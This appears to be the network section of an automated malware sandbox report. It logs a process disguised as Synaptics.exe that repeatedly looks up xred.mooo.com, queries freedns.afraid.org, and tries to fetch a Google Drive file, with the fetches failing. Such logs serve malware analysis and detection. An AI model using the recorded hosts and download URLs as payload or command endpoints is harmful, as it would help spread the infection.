Dec 30, 2024 11:40:37.150885105 CET | 1.1.1.1 | 192.168.2.6 | 0xd3e6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:37.169770002 CET | 1.1.1.1 | 192.168.2.6 | 0xdbf1 | No error (0) | freedns.afraid.org |  | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:38.146079063 CET | 1.1.1.1 | 192.168.2.6 | 0x8717 | No error (0) | drive.usercontent.google.com |  | 142.250.185.65 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:43.608350992 CET | 1.1.1.1 | 192.168.2.6 | 0x4013 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:50.578278065 CET | 1.1.1.1 | 192.168.2.6 | 0xa45f | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:57.421999931 CET | 1.1.1.1 | 192.168.2.6 | 0xc7c | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:41:01.952713013 CET | 1.1.1.1 | 192.168.2.6 | 0xba16 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:41:16.633574963 CET | 1.1.1.1 | 192.168.2.6 | 0xcd76 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
• docs.google.com
• drive.usercontent.google.com
• freedns.afraid.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49751 | 69.42.215.252 | 80 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:40:37.176495075 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
Dec 30, 2024 11:40:37.786283016 CET | 243 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Dec 2024 10:40:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649742142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:37 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:37 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-7JmoGStwlU-jRuILUD12gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      1 | 192.168.2.6 | 49741 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:37 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:37 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wkYxvGQahR5Uh3sUbg_hag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      2 | 192.168.2.6 | 49759 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:38 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LOhPrLPKklLXzkuD42DNUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      3 | 192.168.2.6 | 49761 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:38 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:40:39 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5NjZUDpzwGZ-E764jvD7gqnznCYxkn8gCFgiob_B6Ou7P6LRXS_uat4TkQVgLcIIei
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-d6BqksB8bJk21Leg9h3EQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk; expires=Tue, 01-Jul-2025 10:40:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:39 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zh2NSZdgjpX-nS5wgdLM-w">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:40:39 UTC | 58 | IN | Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      4 | 192.168.2.6 | 49762 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:38 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:40:39 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC62M3jCQXortMmokBrUGlmUrsZKeo07pK8TwJB3waK_8GFoyabIjZXWvr6RqUF9Dr-fxIIkGhw
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce--WplRxNcX56DZt7mI1z9dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-; expires=Tue, 01-Jul-2025 10:40:39 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:39 UTC | 1602 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LbyLuxP_sYZ194Wy-_-WEw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:40:39 UTC | 50 | IN | Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      5 | 192.168.2.6 | 49760 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fM769DfwX2mngRETQyFwYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      6 | 192.168.2.6 | 49774 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-14DxW1SlVmowf6uJQAmF5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      7 | 192.168.2.6 | 49775 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:39 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:40:40 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6Rml3YnEOq65rDZjkua5UqhaROy1ATmupOuW1IFeKsAp_f2ugh5JJlr0nP00wV8mFm
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aAJppFj6bCC4l6Zf1EC6yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7; expires=Tue, 01-Jul-2025 10:40:40 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:40 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N5DpkcM40-KmD2OG604_uQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:40:40 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      8 | 192.168.2.6 | 49777 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-vhhz3Y1O67UX61vbLyznaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      9 | 192.168.2.6 | 49778 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                                                                                                                      2024-12-30 10:40:40 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC78uzettXvUXXFIJixkANh297TWjhG6OYsKypmDUqXiVOn_rOyo--t_-VaUr9nybv1V
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EfxtQkcdyGYydNKYbQeA8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
